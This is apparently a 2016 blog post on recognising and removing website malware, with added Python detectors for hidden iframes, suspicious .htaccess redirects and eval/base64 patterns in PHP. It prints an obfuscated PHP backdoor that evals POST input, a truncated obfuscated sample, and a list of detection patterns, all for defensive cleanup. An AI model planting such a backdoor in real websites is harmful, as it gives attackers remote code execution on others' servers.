Malware Prevention / Removal Techniques - Part 1 (Introduction)


While trying to access your website, you end up seeing a warning from Google that your website is probably hacked; could this be a bad day?

No, it's not. Don't let such a thing ruin it!

In this article, I will present some of the most common malware types and the best techniques for removing, cleaning, or preventing them.

The most common types of malware include the following:

Iframe

Also known as an inline frame. This is iframe code that has been injected into your website, often with a window size of zero pixels. You can't see it, but your web browser still loads it.
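To check a page for the zero-size frames described above, here is an added example (not code from the original article) that parses HTML and reports iframes a visitor cannot see. The names HiddenIframeFinder and find_hidden_iframes, the extra display:none / visibility:hidden checks, and the sample page are my own assumptions.

```python
from html.parser import HTMLParser
import re

# Width/height attribute values that mean "zero": 0, 0px, 0%.
ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%|em|pt)?\s*$", re.I)
# Inline styles that hide a frame: zero size, display:none, visibility:hidden.
HIDDEN_STYLE = re.compile(
    r"(?:^|;)\s*(?:(?:width|height)\s*:\s*0+(?:px|%|em|pt)?\s*(?:;|$)"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)


class HiddenIframeFinder(HTMLParser):
    """Collects (line, src, reason) for iframes a visitor cannot see."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = [f"{dim}=0" for dim in ("width", "height")
                   if dim in a and ZERO.match(a[dim])]
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden via style")
        if reasons:
            self.findings.append(
                (self.getpos()[0], a.get("src", ""), ", ".join(reasons)))


def find_hidden_iframes(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: one visible embed, two hidden frames.
SAMPLE = """<html><body>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<iframe src="http://injected.example.invalid/x" width="0" height="0"></iframe>
<p>content</p>
<iframe src="http://injected.example.invalid/y" style="visibility:hidden; position:absolute"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src, why in find_hidden_iframes(SAMPLE):
        print(f"line {line}: {src} ({why})")
```

Run it against the HTML your server actually sends (saved from the browser or fetched with a plain HTTP client), since injected frames are often added at request time and are not present in the template files.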

Backdoors

Backdoors are server-side malicious scripts intended to gain malicious access to your server. The most common examples of these types of gremlins are:

  • File Managers
  • Various Web Shells
  • Injection Scripts
  • Email SPAM Scripts
  • SEO SPAM Scripts

For example:

  1. A File Manager backdoor allows attackers to access your whole hosting account/server. With that access, they can modify, remove, or reinfect server-side files and serve infected files to your visitors.
  2. Email SPAM Scripts allow attackers to send SPAM emails directly from your server, mostly ones that promote "Lose Weight" or "Reverse Aging" offers. Such emails may come through your server.
  3. SEO SPAM Scripts - the most malicious technique to manipulate Google results.

.htaccess malware (Conditional redirections)

Conditional redirections are generally done through the HTTP headers (via .htaccess) to redirect users from certain browsers or locations to malware/malicious locations.

Example: A user coming from a search engine (like Google) or with a certain user agent gets redirected to a malicious domain.
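The following added example (not from the original article) shows one way to spot such a rule: it flags every RewriteRule that is guarded by a referer or user-agent RewriteCond and points at a host you do not own. The function name, the own_hosts parameter, the host names and the sample .htaccess are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Request properties the article names as redirect triggers: where the
# visitor came from (referer) and which browser/agent they use.
TRIGGER = re.compile(r"%\{HTTP_(REFERER|USER_AGENT)\}", re.I)


def find_conditional_redirects(htaccess_text, own_hosts):
    """Return (line_no, trigger_vars, target) for each RewriteRule that is
    guarded by referer/user-agent conditions and points at a foreign host."""
    findings, pending = [], []
    for no, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()  # naive split: quoted patterns with spaces not handled
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            m = TRIGGER.search(parts[1])
            if m:
                pending.append(m.group(1).upper())
        elif directive == "rewriterule" and len(parts) >= 3:
            # RewriteCond lines only apply to the next RewriteRule.
            target = parts[2]
            host = (urlparse(target).hostname or "").lower()
            if pending and host and host not in own_hosts:
                findings.append((no, sorted(set(pending)), target))
            pending = []
    return findings


# Constructed sample: a normal CMS block, one suspicious conditional
# redirect, and one legitimate redirect to the site's own host.
SAMPLE = """\
# BEGIN WordPress
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/in.php [R=302,L]
RewriteCond %{HTTP_USER_AGENT} ^OldBot [NC]
RewriteRule ^ https://www.mysite.example/upgrade [R,L]
"""

if __name__ == "__main__":
    for hit in find_conditional_redirects(SAMPLE, {"www.mysite.example"}):
        print(hit)
```

Because the redirect only fires for certain referers or user agents, the site owner typing the URL directly usually never sees it; reading the .htaccess file is more reliable than browsing the site.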

Prevention / Cleaning

1. WordPress // Wordfence

For WordPress, I would suggest using a plugin called Wordfence.

This plugin can help you prevent and even clean up your infected website.

After installing the plugin, head over to Options and be sure to enable/include all types of scans.

Then click Save Changes and head over to Scan Process. Once scanning is completed, you will have a list of issues (if any) and options to recover the original files if there is a difference between a file located on the server and the original version from the plugin/theme or even the WordPress core repository.

2. PHP

The most common types of PHP malware are encrypted, encoded, or in some cases a combination of both. It is not always as simple as looking for encrypted code: you need some general knowledge of PHP and familiarity with your hosted PHP script and CMS so that you can detect and remove malicious PHP code.

Sample 1:

<?php $xxf5 ="ues_tpro"; $skk16 = $xxf5[2]. $xxf5[4].$xxf5[6].$xxf5[4]. $xxf5[7].$xxf5[0]. $xxf5[5].$xxf5[5].$xxf5[1].$xxf5[6]; $fka19=$skk16 ($xxf5[3].$xxf5[5] . $xxf5[7].$xxf5[2].$xxf5[4] );if (isset( ${$fka19 } [ 'q73dce7'])){eval(${$fka19} ['q73dce7']) ;}?> 
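Sample 1 can be read without ever running it. This added example (not part of the original article) statically folds the string-index lookups back into plain literals; the function name resolve_string_indexing is my own, and the sample is copied from above with line breaks added.

```python
import re

ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"\\$]*)"\s*;')   # $name = "literal";
INDEXED = re.compile(r'\$(\w+)\s*\[\s*(\d+)\s*\]')        # $name[3]
CONCAT = re.compile(r'"([^"]*)"\s*\.\s*"([^"]*)"')        # "a" . "b"


def resolve_string_indexing(php_source):
    """Statically fold $var[n] lookups on literal strings; never executes PHP."""
    tables = dict(ASSIGN.findall(php_source))

    def lookup(m):
        name, idx = m.group(1), int(m.group(2))
        if name in tables and idx < len(tables[name]):
            return '"' + tables[name][idx] + '"'
        return m.group(0)  # unknown variable or index: leave untouched

    out = INDEXED.sub(lookup, php_source)
    # Repeatedly merge adjacent literals: "s" . "t" -> "st"
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if merged == out:
            return out
        out = merged


# Sample 1 from the article (line breaks added, otherwise unchanged).
SAMPLE_1 = r'''<?php $xxf5 ="ues_tpro"; $skk16 = $xxf5[2]. $xxf5[4].$xxf5[6].$xxf5[4].
$xxf5[7].$xxf5[0]. $xxf5[5].$xxf5[5].$xxf5[1].$xxf5[6];
$fka19=$skk16 ($xxf5[3].$xxf5[5] . $xxf5[7].$xxf5[2].$xxf5[4] );
if (isset( ${$fka19 } [ 'q73dce7'])){eval(${$fka19} ['q73dce7']) ;}?>'''

if __name__ == "__main__":
    print(resolve_string_indexing(SAMPLE_1))
```

The folded output shows $skk16 is "strtoupper" and $fka19 is strtoupper("_post"), so the script passes whatever arrives in $_POST['q73dce7'] to eval. Note that none of the search strings listed further down appear in this sample, which is why pattern searches alone are not enough.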

Sample 2:

<?php $GLOBALS['j91600'] = "\x49\xd\x5d\x2d\x2f\x5b\x20\x3f\x4a\x39\x31\x7c\x4b\x35\x77\x68\x33\x7d\x60\x72\x6c\x3e\x9\x5c\x5a\x78\x24\x52\x54\x76\x41\x44\x64\x2b\x38\x2e\x40\x57\x30\x73\xa\x36\x43\x3a\x56\x4f\x7b\x70\x74\x4e\x4c\x29\x5e\x34\x6f\x37\x21\x58\x7e\x25\x69\x3b\x7a\x6b\x51\x23\x28\x63\x53\x61\x22\x55\x71\x45\x48\x59\x42\x46\x3c\x6a\x75\x5f\x62\x67\x3d\x27\x79\x26\x2a\x65\x6d\x6e\x50\x2c\x32\x4d\x47\x66";
$GLOBALS[$GLOBALS['j91600'][80].$GLOBALS['j91600'][38].$GLOBALS['j91600'][82].$GLOBALS['j91600'][9].$GLOBALS['j91600'][67].$GLOBALS['j91600'][89]] = $GLOBALS['j91600'][67].$GLOBALS['j91600'][15].$GLOBALS['j91600'][19];
$GLOBALS[$GLOBALS['j91600'][97].$GLOBALS['j91600'][89].$GLOBALS['j91600'][10].$GLOBALS['j91600'][53]] = $GLOBALS['j91600'][54].$GLOBALS['j91600'][19].$GLOBALS['j91600'][32];
$GLOBALS[$GLOBALS['j91600'][14].$GLOBALS['j91600'][53].$GLOBALS['j91600'][32].$GLOBALS['j91600'][10].$GLOBALS['j91600'][94].$GLOBALS['j91600'][10]] = $GLOBALS['j91600'][39].$GLOBALS['j91600'][48].$GLOBALS['j91600'][19].$GLOBALS['j91600'][20].$GLOBALS['j91600'][89].$GLOBALS['j91600'][91];
$GLOBALS[$GLOBALS['j91600'][15].$GLOBALS['j91600'][32].$GLOBALS['j91600'][82].$GLOBALS['j91600'][34].$GLOBALS['j91600'][16].$GLOBALS['j91600'][34]] = $GLOBALS['j91600'][60].$GLOBALS['j91600'][91].$GLOBALS['j91600']... etc.

Search all PHP files for any of the common patterns used:

  • base64_decode
  • gzinflate(base64_decode
  • eval(gzinflate(base64_decode
  • eval(base64_decode
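As an added example (not from the original article), the search above can be scripted so that it tolerates extra whitespace and mixed case and reports only the most specific pattern per line. The function names and the three demo files are constructed for illustration.

```python
import os
import re
import tempfile

# The four patterns listed in the article, most specific first. \s* tolerates
# padding such as "eval ( base64_decode (", and PHP function names are
# case-insensitive, hence re.I.
PATTERNS = [
    ("eval(gzinflate(base64_decode", r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\("),
    ("eval(base64_decode", r"eval\s*\(\s*base64_decode\s*\("),
    ("gzinflate(base64_decode", r"gzinflate\s*\(\s*base64_decode\s*\("),
    ("base64_decode", r"base64_decode\s*\("),
]
COMPILED = [(label, re.compile(rx, re.I)) for label, rx in PATTERNS]


def scan_php_tree(root):
    """Return sorted (relative_path, line_no, label) hits under root."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    for label, rx in COMPILED:
                        if rx.search(line):
                            hits.append((os.path.relpath(path, root), no, label))
                            break  # report only the most specific match
    return sorted(hits)


def build_demo_tree(root):
    """Write three constructed files: two suspicious, one clean."""
    files = {
        "404.php": "<?php\n@EVAL ( gzinflate( base64_decode('AAAA')));\n",
        "inc/title.php": "<?php\n$x = 1;\n$d = base64_decode($_GET['p']);\n",
        "index.php": "<?php echo 'hello';\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        print(*scan_php_tree(demo), sep="\n")
```

Treat the hits as leads for manual review: a plain base64_decode call also appears in plenty of legitimate plugins and libraries, while the eval combinations deserve a close look first.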

To manually remove malware code from infected PHP files, you will need some basic knowledge of editing PHP code.

Most file names are among the following:

  1. login.php
  2. index.php
  3. upload.php
  4. title.php
  5. 404.php
  6. 500.php

In some cases, there are randomly generated file names, such as 'dsa03xf.php'.

Coming soon in Part 2:

  • JavaScript Malware code
  • Online Malware Scanners
  • .htaccess malware recognition and removal
  • Email/SEO Spam scripts
  • Google malware or unwanted software review
  • IP Blacklisting scanning/removal

I hope that you found this Part 1 of Malware Prevention/Removal Techniques useful. Please stay tuned for Part 2 and if you need my help, feel free to contact me.

Posted 30 January, 2016

</> dvlpmt

Software maverick.

Creative technologist and web/software developer for more than 12 years with strong interpersonal, communicative and organizational skills. In my career, I've delivered more than 600 projects for small and large business owners. I use my creativity to build new solutions that provide strategic advantage to my clients and improve the overall experience of the end users.
